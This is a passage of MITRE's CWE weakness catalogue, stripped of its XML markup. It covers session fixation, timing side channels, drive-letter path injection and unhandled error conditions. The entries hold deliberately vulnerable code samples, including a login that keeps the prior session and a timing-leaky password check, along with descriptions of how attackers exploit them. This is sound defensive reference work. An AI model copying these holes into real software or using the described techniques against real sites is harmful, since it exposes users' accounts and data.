updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - J2EE Bad Practices: Threads - J2EE Bad Practices: Use of Threads - - - - Authenticating a user, or otherwise establishing a new user session, without invalidating any existing session identifier gives an attacker the opportunity to steal authenticated sessions. - - Such a scenario is commonly observed when: - - A web application authenticates a user without first invalidating the existing session, thereby continuing to use the session already associated with the user. - An attacker is able to force a known session identifier on a user so that, once the user authenticates, the attacker has access to the authenticated session. - The application or container uses predictable session identifiers. In the generic exploit of session fixation vulnerabilities, an attacker creates a new session on a web application and records the associated session identifier. The attacker then causes the victim to associate, and possibly authenticate, against the server using that session identifier, giving the attacker access to the user's account through the active session. - - - - - - - - - - - - - - - Architecture and Design - - - Implementation - - - - - Access Control - Gain Privileges or Assume Identity - - - - - Architecture and Design - Invalidate any existing session identifiers prior to authorizing a new user session. - - - Architecture and Design - For platforms such as ASP that do not generate new values for sessionid cookies, utilize a secondary cookie. In this approach, set a secondary cookie on the user's browser to a random value and set a session variable to the same value. If the session variable and the cookie value ever don't match, invalidate the session, and force the user to log on again. - - - - - The following example shows a snippet of code from a J2EE web application where the application authenticates users with LoginContext.login() without first calling HttpSession.invalidate(). - - private void auth(LoginContext lc, HttpSession session) throws LoginException {...lc.login();...} - - In order to exploit the code above, an attacker could first create a session (perhaps by logging into the application) from a public terminal, record the session identifier assigned by the application, and reset the browser to the login page. Next, a victim sits down at the same public terminal, notices the browser open to the login page of the site, and enters credentials to authenticate against the application. The code responsible for authenticating the victim continues to use the pre-existing session identifier, now the attacker simply uses the session identifier recorded earlier to access the victim's active session, providing nearly unrestricted access to the victim's account for the lifetime of the session. Even given a vulnerable application, the success of the specific attack described here is dependent on several factors working in the favor of the attacker: access to an unmonitored public terminal, the ability to keep the compromised session active and a victim interested in logging into the vulnerable application on the public terminal. - In most circumstances, the first two challenges are surmountable given a sufficient investment of time. Finding a victim who is both using a public terminal and interested in logging into the vulnerable application is possible as well, so long as the site is reasonably popular. The less well known the site is, the lower the odds of an interested victim using the public terminal and the lower the chance of success for the attack vector described above. The biggest challenge an attacker faces in exploiting session fixation vulnerabilities is inducing victims to authenticate against the vulnerable application using a session identifier known to the attacker. - In the example above, the attacker did this through a direct method that is not subtle and does not scale suitably for attacks involving less well-known web sites. However, do not be lulled into complacency; attackers have many tools in their belts that help bypass the limitations of this attack vector. The most common technique employed by attackers involves taking advantage of cross-site scripting or HTTP response splitting vulnerabilities in the target site [12]. By tricking the victim into submitting a malicious request to a vulnerable application that reflects JavaScript or other code back to the victim's browser, an attacker can create a cookie that will cause the victim to reuse a session identifier controlled by the attacker. It is worth noting that cookies are often tied to the top level domain associated with a given URL. If multiple applications reside on the same top level domain, such as bank.example.com and recipes.example.com, a vulnerability in one application can allow an attacker to set a cookie with a fixed session identifier that will be used in all interactions with any application on the domain example.com [29]. - - - The following example shows a snippet of code from a J2EE web application where the application authenticates users with a direct post to the <code>j_security_check</code>, which typically does not invalidate the existing session before processing the login request. - - <form method="POST" action="j_security_check"><input type="text" name="j_username"><input type="text" name="j_password"></form> - - - - - - Session Fixation - - - A3 - Broken Authentication and Session Management - CWE More Specific - - - 37 - Session Fixation - - - - - - - - - - - - - - - - Other attack vectors include DNS poisoning and related network based attacks where an attacker causes the user to visit a malicious site by redirecting a request for a valid site. Network based attacks typically involve a physical presence on the victim's network or control of a compromised machine on the network, which makes them harder to exploit remotely, but their significance should not be overlooked. Less secure session management mechanisms, such as the default implementation in Apache Tomcat, allow session identifiers normally expected in a cookie to be specified on the URL as well, which enables an attacker to cause a victim to use a fixed session identifier simply by emailing a malicious URL. - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - Veracode - 2008-08-15 - Suggested OWASP Top Ten 2004 mapping - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-07-27 - updated Demonstrative_Examples, Related_Attack_Patterns - - - CWE Content Team - MITRE - 2010-02-16 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2013-07-17 - updated Relationships - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Description - - - - - Covert timing channels convey information by modulating some aspect of system behavior over time, so that the program receiving the information can observe system behavior and infer protected information. - - In some instances, knowing when data is transmitted between parties can provide a malicious user with privileged information. Also, externally monitoring the timing of operations can potentially reveal sensitive data. For example, a cryptographic operation can expose its internal state if the time it takes to perform the operation varies, based on the state. - Covert channels are frequently classified as either storage or timing channels. Some examples of covert timing channels are the system's paging rate, the time a certain transaction requires to execute, and the time it takes to gain access to a shared bus. - - - - - - - - - - Architecture and Design - - - Implementation - - - Medium - - - Confidentiality - Other - Read Application Data - Other - Information exposure. - - - - - Architecture and Design - Whenever possible, specify implementation strategies that do not introduce time variances in operations. - - - Implementation - Often one can artificially manipulate the time which operations take or -- when operations occur -- can remove information from the attacker. - - - Implementation - It is reasonable to add artificial or random delays so that the amount of CPU time consumed is independent of the action being taken by the application. - - - - - In this example, the attacker observes how long an authentication takes when the user types in the correct password. - When the attacker tries their own values, they can first try strings of various length. When they find a string of the right length, the computation will take a bit longer, because the for loop will run at least once. Additionally, with this code, the attacker can possibly learn one character of the password at a time, because when they guess the first character right, the computation will take longer than a wrong guesses. Such an attack can break even the most sophisticated password with a few hundred guesses. - - def validate_password(actual_pw, typed_pw): - if len(actual_pw) <> len(typed_pw):return 0 - for i in len(actual_pw):if actual_pw[i] <> typed_pw[i]:return 0 - - return 1 - - - - Note that, in this example, the actual password must be handled in constant time, as far as the attacker is concerned, even if the actual password is of an unusual length. This is one reason why it is good to use an algorithm that, among other things, stores a seeded cryptographic one-way hash of the password, then compare the hashes, which will always be of the same length. - - - - - Timing - - - Covert Timing Channel - - - - - - - - - - - Landwehr - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2009-07-27 - updated Description, Other_Notes, Potential_Mitigations - - - CWE Content Team - MITRE - 2010-09-27 - updated Common_Consequences, Description - - - CWE Content Team - MITRE - 2011-03-29 - updated Description - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Demonstrative_Examples - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - - - - A constant symbolic reference to an object is used, even though the reference can resolve to a different object over time. - - - - - - - - - - - - Architecture and Design - - - Implementation - - - - - Access Control - Gain Privileges or Assume Identity - The attacker can gain access to otherwise unauthorized resources. - - - Integrity - Confidentiality - Other - Modify Application Data - Modify Files or Directories - Read Application Data - Read Files or Directories - Other - Race conditions such as this kind may be employed to gain read or write access to resources not normally readable or writable by the user in question. - - - Integrity - Other - Modify Application Data - Other - The resource in question, or other resources (through the corrupted one) may be changed in undesirable ways by a malicious user. - - - Non-Repudiation - Hide Activities - If a file or other resource is written in this method, as opposed to a valid way, logging of the activity may not occur. - - - Non-Repudiation - Integrity - Modify Files or Directories - In some cases it may be possible to delete files that a malicious user might not otherwise have access to -- such as log files. - - - - - Symbolic name not mapping to correct object - - - - - - - - CLASP - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - - - - An attacker can inject a drive letter or Windows volume letter ('C:dirname') into a software system to potentially redirect access to an unintended location or arbitrary file. - - - - - - - - - Implementation - - - - - Integrity - Confidentiality - Availability - Execute Unauthorized Code or Commands - The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries. - - - Integrity - Modify Files or Directories - The attacker may be able to overwrite or create critical files, such as programs, libraries, or important data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, appending a new account at the end of a password file may allow an attacker to bypass authentication. - - - Confidentiality - Read Files or Directories - The attacker may be able read the contents of unexpected files and expose sensitive data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, by reading a password file, the attacker could conduct brute force password guessing attacks in order to break into an account on the system. - - - Availability - DoS: Crash, Exit, or Restart - The attacker may be able to overwrite, delete, or corrupt unexpected critical files such as programs, libraries, or important data. This may prevent the software from working at all and in the case of a protection mechanisms such as authentication, it has the potential to lockout every user of the software. - - - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434. - Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string. - - High - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - CVE-2001-0038 - Remote attackers can read arbitrary files by specifying the drive letter in the requested URL. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0038 - - - CVE-2001-0255 - FTP server allows remote attackers to list arbitrary directories by using the "ls" command and including the drive letter name (e.g. C:) in the requested pathname. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0255 - - - CVE-2001-0687 - FTP server allows a remote attacker to retrieve privileged system information by specifying arbitrary paths. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0687 - - - CVE-2001-0933 - FTP server allows remote attackers to list the contents of arbitrary drives via a ls command that includes the drive letter as an argument. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0933 - - - CVE-2002-0466 - Server allows remote attackers to browse arbitrary directories via a full pathname in the arguments to certain dynamic pages. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0466 - - - CVE-2002-1483 - Remote attackers can read arbitrary files via an HTTP request whose argument is a filename of the form "C:" (Drive letter), "//absolute/path", or ".." . - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1483 - - - CVE-2004-2488 - FTP server read/access arbitrary files using "C:\" filenames - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2488 - - - - - 'C:dirname' or C: (Windows volume or 'drive letter') - - - FIO05-C - Identify files using multiple file attributes - - - SFP16 - Path Traversal - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-07-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-06-21 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2021-03-15 - updated Potential_Mitigations - - Path Issue - Drive Letter or Windows Volume - 'C:dirname' - - - - The software detects a specific error, but takes no actions to handle the error. - - - - - - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - Medium - - - Integrity - Other - Varies by Context - Unexpected State - Alter Execution Logic - An attacker could utilize an ignored error condition to place the system in an unexpected state that could lead to the execution of unintended logic and could cause other unintended behavior. - - - - - Implementation - Properly handle each exception. This is the recommended solution. Ensure that all exceptions are handled in such a way that you can be sure of the state of your system at any given moment. - - - Implementation - If a function returns an error, it is important to either fix the problem and try again, alert the user that an error has happened and let the program continue, or alert the user and close and cleanup the program. - - - Testing - Subject the software to extensive testing to discover some of the possible instances of where/how errors or return values are not handled. Consider testing techniques such as ad hoc, equivalence partitioning, robustness and fault tolerance, mutation, and fuzzing. - - - - - The following example attempts to allocate memory for a character. After the call to malloc, an if statement is used to check whether the malloc function failed. - - foo=malloc(sizeof(char)); //the next line checks to see if malloc failedif (foo==NULL) {//We do nothing so we just ignore the error.} - - The conditional successfully detects a NULL return value from malloc indicating a failure, however it does not do anything to handle the problem. Unhandled errors may have unexpected results and may cause the program to crash or terminate. - Instead, the if block should contain statements that either attempt to fix the problem or notify the user that an error has occurred and continue processing or perform some cleanup and gracefully terminate the program. The following example notifies the user that the malloc function did not allocate the required memory resources and returns an error code. - - foo=malloc(sizeof(char)); //the next line checks to see if malloc failedif (foo==NULL) {printf("Malloc failed to allocate memory resources");return -1;} - - - - In the following C++ example the method readFile() will read the file whose name is provided in the input parameter and will return the contents of the file in char string. The method calls open() and read() may result in errors if the file does not exist or does not contain any data to read. These errors will be thrown when the is_open() method and good() method indicate errors opening or reading the file. However, these errors are not handled within the catch statement. Catch statements that do not perform any processing will have unexpected results. In this case an empty char string will be returned, and the file will not be properly closed. - - char* readfile (char *filename) { - try { - // open input fileifstream infile;infile.open(filename); - if (!infile.is_open()) {throw "Unable to open file " + filename;} - // get length of fileinfile.seekg (0, ios::end);int length = infile.tellg();infile.seekg (0, ios::beg); - // allocate memorychar *buffer = new char [length]; - // read data from fileinfile.read (buffer,length); - if (!infile.good()) {throw "Unable to read from file " + filename;} - infile.close(); - return buffer; - }catch (...) {/* bug: insert code to handle this later */} - } - - The catch statement should contain statements that either attempt to fix the problem or notify the user that an error has occurred and continue processing or perform some cleanup and gracefully terminate the program. The following C++ example contains two catch statements. The first of these will catch a specific error thrown within the try block, and the second catch statement will catch all other errors from within the catch block. Both catch statements will notify the user that an error has occurred, close the file, and rethrow to the block that called the readFile() method for further handling or possible termination of the program. - - char* readFile (char *filename) { - try { - // open input fileifstream infile;infile.open(filename); - if (!infile.is_open()) {throw "Unable to open file " + filename;} - // get length of fileinfile.seekg (0, ios::end);int length = infile.tellg();infile.seekg (0, ios::beg); - // allocate memorychar *buffer = new char [length]; - // read data from fileinfile.read (buffer,length); - if (!infile.good()) {throw "Unable to read from file " + filename;}infile.close(); - return buffer; - }catch (char *str) {printf("Error: %s \n", str);infile.close();throw str;}catch (...) {printf("Error occurred trying to read from file \n");infile.close();throw;} - } - - - - In the following Java example the method readFile will read the file whose name is provided in the input parameter and will return the contents of the file in a String object. The constructor of the FileReader object and the read method call may throw exceptions and therefore must be within a try/catch block. While the catch statement in this example will catch thrown exceptions in order for the method to compile, no processing is performed to handle the thrown exceptions. Catch statements that do not perform any processing will have unexpected results. In this case, this will result in the return of a null String. - - public String readFile(String filename) { - String retString = null;try { - // initialize File and FileReader objectsFile file = new File(filename);FileReader fr = new FileReader(file); - // initialize character bufferlong fLen = file.length();char[] cBuf = new char[(int) fLen]; - // read data from fileint iRead = fr.read(cBuf, 0, (int) fLen); - // close filefr.close(); - retString = new String(cBuf); - - } catch (Exception ex) {/* do nothing, but catch so it'll compile... */}return retString; - } - - The catch statement should contain statements that either attempt to fix the problem, notify the user that an exception has been raised and continue processing, or perform some cleanup and gracefully terminate the program. The following Java example contains three catch statements. The first of these will catch the FileNotFoundException that may be thrown by the FileReader constructor called within the try/catch block. The second catch statement will catch the IOException that may be thrown by the read method called within the try/catch block. The third catch statement will catch all other exceptions thrown within the try block. For all catch statements the user is notified that the exception has been thrown and the exception is rethrown to the block that called the readFile() method for further processing or possible termination of the program. Note that with Java it is usually good practice to use the getMessage() method of the exception class to provide more information to the user about the exception raised. - - public String readFile(String filename) throws FileNotFoundException, IOException, Exception { - String retString = null;try { - // initialize File and FileReader objectsFile file = new File(filename);FileReader fr = new FileReader(file); - // initialize character bufferlong fLen = file.length();char [] cBuf = new char[(int) fLen]; - // read data from fileint iRead = fr.read(cBuf, 0, (int) fLen); - // close filefr.close(); - retString = new String(cBuf); - - } catch (FileNotFoundException ex) {System.err.println ("Error: FileNotFoundException opening the input file: " + filename );System.err.println ("" + ex.getMessage() );throw new FileNotFoundException(ex.getMessage());} catch (IOException ex) {System.err.println("Error: IOException reading the input file.\n" + ex.getMessage() );throw new IOException(ex);} catch (Exception ex) {System.err.println("Error: Exception reading the input file.\n" + ex.getMessage() );throw new Exception(ex);}return retString; - } - - - - - - Improper error handling - - - ERR00-J - Do not suppress or ignore checked exceptions - - - SFP4 - Unchecked Status Condition - - - - - - - - - CLASP - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-11-24 - updated Demonstrative_Examples, Description, Other_Notes, Potential_Mitigations - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - CWE Content Team - MITRE - 2009-07-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, References, Relationships - - - CWE Content Team - MITRE - 2014-02-18 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Modes_of_Introduction, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Related_Attack_Patterns, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Type - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - Improper Error Handling - - - - [PLANNED FOR DEPRECATION. SEE MAINTENANCE NOTES AND CONSIDER CWE-252, CWE-248, OR CWE-1069.] Ignoring exceptions and other error conditions may allow an attacker to induce unexpected behavior unnoticed. - - - - - - - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - Medium - - - Integrity - Other - Varies by Context - Unexpected State - Alter Execution Logic - - - - - Requirements - The choice between a language which has named or unnamed exceptions needs to be done. While unnamed exceptions exacerbate the chance of not properly dealing with an exception, named exceptions suffer from the up call version of the weak base class problem. - - - Requirements - A language can be used which requires, at compile time, to catch all serious exceptions. However, one must make sure to use the most current version of the API as new exceptions could be added. - - - Implementation - Catch all relevant exceptions. This is the recommended solution. Ensure that all exceptions are handled in such a way that you can be sure of the state of your system at any given moment. - - - - - The following code excerpt ignores a rarely-thrown exception from doExchange(). - - try {doExchange();}catch (RareException e) { - - - // this can never happen - - - } - - If a RareException were to ever be thrown, the program would continue to execute as though nothing unusual had occurred. The program records no evidence indicating the special situation, potentially frustrating any later attempt to explain the program's behavior. - - - - - Unchecked Return Value - - - Empty Catch Block - - - Uncaught exception - - - A7 - Improper Error Handling - CWE More Specific - - - ERR00-C - Adopt and implement a consistent and comprehensive error-handling policy - - - ERR33-C - Detect and handle standard library errors - CWE More Abstract - - - ERR34-C - Detect errors when converting a string to a number - CWE More Abstract - - - FLP32-C - Prevent or detect domain and range errors in math functions - Imprecise - - - POS54-C - Detect and handle POSIX library errors - CWE More Abstract - - - EXP31-PL - Do not suppress or ignore exceptions - Imprecise - - - SFP4 - Unchecked Status Condition - - - - - - - This entry is slated for deprecation; it has multiple widespread interpretations by CWE analysts. It currently combines information from three different taxonomies, but each taxonomy is talking about a slightly different issue. CWE analysts might map to this entry based on any of these issues. 7PK has "Empty Catch Block" which has an association with empty exception block (CWE-1069); in this case, the exception has performed the check, but does not handle. In PLOVER there is "Unchecked Return Value" which is CWE-252, but unlike "Empty Catch Block" there isn't even a check of the issue - and "Unchecked Error Condition" implies lack of a check. For CLASP, "Uncaught Exception" (CWE-248) is associated with incorrect error propagation - uncovered in CWE 3.2 and earlier, at least. There are other issues related to error handling and checks. - - When a programmer ignores an exception, they implicitly state that they are operating under one of two assumptions: - - - This method call can never fail. - It doesn't matter if this call fails. - - - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - KDM Analytics - 2008-08-01 - added/updated white box definitions - - - Veracode - 2008-08-15 - Suggested OWASP Top Ten 2004 mapping - - - CWE Content Team - MITRE - 2008-09-08 - updated Maintenance_Notes, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples - - - KDM Analytics - 2009-07-17 - Improved the White_Box_Definition - - - CWE Content Team - MITRE - 2009-07-27 - updated White_Box_Definitions - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated Other_Notes - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Modes_of_Introduction, Relationships, Taxonomy_Mappings, White_Box_Definitions - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-06-20 - updated Description, Maintenance_Notes - - - CWE Content Team - MITRE - 2020-02-24 - updated References - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Description, Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Relationships - - - - - The software encounters an error but does not provide a status code or return value to indicate that an error has occurred. - - - - - - - - - Primary - - - Resultant - - - - - - - - Architecture and Design - OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. - - - Implementation - - - - - Integrity - Other - Varies by Context - Unexpected State - Errors that are not properly reported could place the system in an unexpected state that could lead to unintended behaviors. - - - - - In the following snippet from a doPost() servlet method, the server returns "200 OK" (default) even if an error occurs. - - try { - - - // Something that may throw an exception. - ... - } catch (Throwable t) {logger.error("Caught: " + t.toString());return;} - - - - - - CVE-2004-0063 - Function returns "OK" even if another function returns a different status code than expected, leading to accepting an invalid PIN number. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0063 - - - CVE-2002-1446 - Error checking routine in PKCS#11 library returns "OK" status even when invalid signature is detected, allowing spoofed messages. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1446 - - - CVE-2002-0499 - Kernel function truncates long pathnames without generating an error, leading to operation on wrong directory. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0499 - - - CVE-2005-2459 - Function returns non-error value when a particular erroneous condition is encountered, leading to resultant NULL dereference. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2459 - - - - - Missing Error Status Code - - - TPS03-J - Ensure that tasks executing in a thread pool do not fail silently - - - SFP6 - Incorrect Exception Behavior - - - - - PLOVER - 2006-07-19 - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - CWE Content Team - MITRE - 2009-10-29 - updated Other_Notes, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2010-12-13 - updated Description, Name - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - Missing Error Status Code - Failure to Report Error in Status Code - - - - A function or operation returns an incorrect return value or status code that does not indicate an error, but causes the product to modify its behavior based on the incorrect result. - This can lead to unpredictable behavior. If the function is used to make security-critical decisions or provide security-critical information, then the wrong status code can cause the software to assume that an action is safe, even when it is not. - - - - - - - - - - Architecture and Design - - - Implementation - - - - - Integrity - Other - Unexpected State - Alter Execution Logic - This weakness could place the system in a state that could lead unexpected logic to be executed or other unintended behaviors. - - - - - In the following example, an HTTP 404 status code is returned in the event of an IOException encountered in a Java servlet. A 404 code is typically meant to indicate a non-existent resource and would be somewhat misleading in this case. - - try { - - - // something that might throw IOException - ... - } catch (IOException ioe) {response.sendError(SC_NOT_FOUND);} - - - - - - CVE-2003-1132 - DNS server returns wrong response code for non-existent AAAA record, which effectively says that the domain is inaccessible. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1132 - - - CVE-2001-1509 - Hardware-specific implementation of system call causes incorrect results from geteuid. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1509 - - - CVE-2001-1559 - System call returns wrong value, leading to a resultant NULL dereference. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1559 - - - CVE-2014-1266 - chain: incorrect "goto" in Apple SSL product bypasses certificate validation, allowing Adversary-in-the-Middle (AITM) attack (Apple "goto fail" bug). CWE-705 (Incorrect Control Flow Scoping) -> CWE-561 (Dead Code) -> CWE-295 (Improper Certificate Validation) -> CWE-393 (Return of Wrong Status Code) -> CWE-300 (Channel Accessible by Non-Endpoint). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1266 - - - - - Wrong Status Code - - - SFP6 - Incorrect Exception Behavior - - - - This can be primary or resultant, but it is probably most often primary to other issues. - - - - PLOVER - 2006-07-19 - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Maintenance_Notes, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - CWE Content Team - MITRE - 2010-02-16 - updated Other_Notes, Relationship_Notes - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Relationships - - - CWE Content Team - MITRE - 2014-06-23 - updated Observed_Examples - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Observed_Examples - - - CWE Content Team - MITRE - 2021-03-15 - updated Maintenance_Notes - - - CWE Content Team - MITRE - 2021-07-20 - updated Observed_Examples - - Wrong Status Code - - - - The software does not properly check when a function or operation returns a value that is 